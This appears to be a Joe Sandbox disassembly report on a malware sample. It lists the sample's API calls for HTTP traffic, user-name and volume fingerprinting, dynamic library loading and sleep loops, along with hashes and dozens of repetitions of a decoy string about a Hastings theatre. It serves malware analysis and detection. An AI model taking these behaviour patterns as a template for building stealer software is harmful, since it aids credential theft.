The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
Instruction ID: 994efd3a0b10ceab7f5143b43c992d696de16e9dedea517f3aaaefbefb2e1973
Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
Instruction Fuzzy Hash: F0413F79740624ABD7109FE5FC4DADCBF70AB4C702BA08061F90A99190C7F993859B7D

Function 004048D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
StrCmpCA.SHLWAPI(?,00A72600), ref: 0040498A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,",00000000,?,00A72500), ref: 00404E38
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
InternetCloseHandle.WININET(00000000), ref: 00404EFD
InternetCloseHandle.WININET(00000000), ref: 00404F15
HttpOpenRequestA.WININET(00000000,00A72650,?,00A72080,00000000,00000000,00400100,00000000), ref: 00404B65

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

InternetCloseHandle.WININET(00000000), ref: 00404F1F

Strings

------, xrefs: 00404A0D
------, xrefs: 00404B78
", xrefs: 00404C42
------, xrefs: 00404CB9
", xrefs: 00404D83

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 2402878923-2180234286
Opcode ID: 4f09bf38ad169b6777b6b4ccff9cf14d6377cb73929ec00304caaf0f6e4c38a4
Instruction ID: 9047d27655e640063cf5e546897bb6ee72beef818384a457e6eae52f2661673c
Opcode Fuzzy Hash: 4f09bf38ad169b6777b6b4ccff9cf14d6377cb73929ec00304caaf0f6e4c38a4
Instruction Fuzzy Hash: 41121072A121189ACB14EB91DD66FEEB379AF14314F50419EF10662091EF383F98CF69

Function 004179E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
Instruction ID: 9b82aaaa51ecd1631f431d3f1c3dae0ecd6dc6cababe86b84151973db8bb3773
Opcode Fuzzy Hash: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
Instruction Fuzzy Hash: 80F04FB1D49249EBC700DF98DD45BAEBBB8EB45711F10021BF615A2680D7755640CBA1

Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
ExitProcess.KERNEL32 ref: 0040117E

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
Instruction ID: 7de8415141d8ede1392e5156f4839a36e98c975bb62c62673ce2cce929d499c4
Opcode Fuzzy Hash: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
Instruction Fuzzy Hash: 9ED05E74D0530DABCB04DFE09D496DDBB79BB0C315F041656DD0572240EA305441CA66

Function 00419BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00A6C0B0), ref: 00419BF1
GetProcAddress.KERNEL32(74DD0000,00A6C140), ref: 00419C0A
GetProcAddress.KERNEL32(74DD0000,00A6C158), ref: 00419C22
GetProcAddress.KERNEL32(74DD0000,00A6C470), ref: 00419C3A
GetProcAddress.KERNEL32(74DD0000,00A6C3E0), ref: 00419C53
GetProcAddress.KERNEL32(74DD0000,00A66718), ref: 00419C6B
GetProcAddress.KERNEL32(74DD0000,00A654C0), ref: 00419C83
GetProcAddress.KERNEL32(74DD0000,00A65320), ref: 00419C9C
GetProcAddress.KERNEL32(74DD0000,00A6C4D0), ref: 00419CB4
GetProcAddress.KERNEL32(74DD0000,00A6C5A8), ref: 00419CCC
GetProcAddress.KERNEL32(74DD0000,00A6C5D8), ref: 00419CE5
GetProcAddress.KERNEL32(74DD0000,00A6C5C0), ref: 00419CFD
GetProcAddress.KERNEL32(74DD0000,00A65400), ref: 00419D15
GetProcAddress.KERNEL32(74DD0000,00A6C5F0), ref: 00419D2E
GetProcAddress.KERNEL32(74DD0000,00A6C308), ref: 00419D46
GetProcAddress.KERNEL32(74DD0000,00A65560), ref: 00419D5E
GetProcAddress.KERNEL32(74DD0000,00A6C320), ref: 00419D77
GetProcAddress.KERNEL32(74DD0000,00A6C338), ref: 00419D8F
GetProcAddress.KERNEL32(74DD0000,00A65480), ref: 00419DA7
GetProcAddress.KERNEL32(74DD0000,00A6C440), ref: 00419DC0
GetProcAddress.KERNEL32(74DD0000,00A65520), ref: 00419DD8
LoadLibraryA.KERNEL32(00A6C3C8,?,00416CA0), ref: 00419DEA
LoadLibraryA.KERNEL32(00A6C380,?,00416CA0), ref: 00419DFB
LoadLibraryA.KERNEL32(00A6C350,?,00416CA0), ref: 00419E0D
LoadLibraryA.KERNEL32(00A6C458,?,00416CA0), ref: 00419E1F
LoadLibraryA.KERNEL32(00A6C368,?,00416CA0), ref: 00419E30
GetProcAddress.KERNEL32(75A70000,00A6C398), ref: 00419E52
GetProcAddress.KERNEL32(75290000,00A6C488), ref: 00419E73
GetProcAddress.KERNEL32(75290000,00A6C3F8), ref: 00419E8B
GetProcAddress.KERNEL32(75BD0000,00A6C3B0), ref: 00419EAD
GetProcAddress.KERNEL32(75450000,00A65440), ref: 00419ECE
GetProcAddress.KERNEL32(76E90000,00A66728), ref: 00419EEF
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419F06

Strings

NtQueryInformationProcess, xrefs: 00419EFA

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
Instruction ID: 85c76ffc39373860cb8090e471c59d53cf6ad49422061259caa86ebb7f60cad9
Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
Instruction Fuzzy Hash: 4DA16FB5D0A2549FC344DFA8FC889567BBBA74D301708A61BF909C3674E734AA40CF62

Function 004062D0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
StrCmpCA.SHLWAPI(?,00A72600), ref: 00406353
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
HttpOpenRequestA.WININET(00000000,GET,?,00A72080,00000000,00000000,00400100,00000000), ref: 004063D5
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
InternetCloseHandle.WININET(00000000), ref: 0040653F
InternetCloseHandle.WININET(00000000), ref: 00406549
InternetCloseHandle.WININET(00000000), ref: 00406553

Strings

ERROR, xrefs: 00406519
GET, xrefs: 004063CC
ERROR, xrefs: 00406457
FUA, xrefs: 004062E0, 0040656D, 0040652E, 0040646C, 004062E3

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$FUA$GET
API String ID: 3074848878-1334267432
Opcode ID: 5a8f6151ca7df3080181d83fed655c04dd351c647b39cdf493827c28a0447c5f
Instruction ID: e13f8b4f5a4983f25bfc964ce73e77e76ffbf3c7ad5d81db2c216f4c68459c1c
Opcode Fuzzy Hash: 5a8f6151ca7df3080181d83fed655c04dd351c647b39cdf493827c28a0447c5f
Instruction Fuzzy Hash: 33718171A00218ABDB14DF90DC59FEEB775AF44304F1081AAF6067B1D4DBB86A84CF59

Function 004119F0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 00411A15
ExitProcess.KERNEL32 ref: 00411A21
strtok_s.MSVCRT ref: 00411A38

Strings

block, xrefs: 00411A07

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: cd7b43887e4950f8968d8b6d5f82b492b8ff13b2f20a6cd64c505f7d0e6e7de9
Instruction ID: 24cedd258c0b2a3a786e48f87e23423129f016670b7ad46fccbec0895e921d59
Opcode Fuzzy Hash: cd7b43887e4950f8968d8b6d5f82b492b8ff13b2f20a6cd64c505f7d0e6e7de9
Instruction Fuzzy Hash: 00513174B0A109DFCB04DF94D984FEE77B9AF44704F10405AE502AB261E778EA91CB5A

Function 00415760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,00A6DD90,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415894
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004158F1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415AA7

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00415440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00415510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 0041557F
Part of subcall function 00415510: StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155D3
Part of subcall function 00415510: strtok.MSVCRT(00000000,?), ref: 004155EE
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155FE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004159DB
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415B90
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415C5C
Sleep.KERNEL32(0000EA60), ref: 00415C6B

Strings

ERROR, xrefs: 004158E3
ERROR, xrefs: 004159CD
ERROR, xrefs: 00415886
ERROR, xrefs: 00415A99
ERROR, xrefs: 00415C4E
ERROR, xrefs: 00415B82

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: d4bfeda11593dca7f9ff7a24f1d2b3bd286b930d2953a7aa732aab3074f6c6cb
Instruction ID: 55671caa9f17e02bf2b096751d64d2e50591885947f125be0164830bf8637258
Opcode Fuzzy Hash: d4bfeda11593dca7f9ff7a24f1d2b3bd286b930d2953a7aa732aab3074f6c6cb
Instruction Fuzzy Hash: 30E1A331A111049BCB14FBA1EDA6EED733EAF54304F40856EF50666091EF386B98CB5A

Function 00417690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
HeapAlloc.KERNEL32(00000000), ref: 0041779A
wsprintfA.USER32 ref: 004177D0

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

\, xrefs: 004176F0
C, xrefs: 004176DC
:, xrefs: 004176EC

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
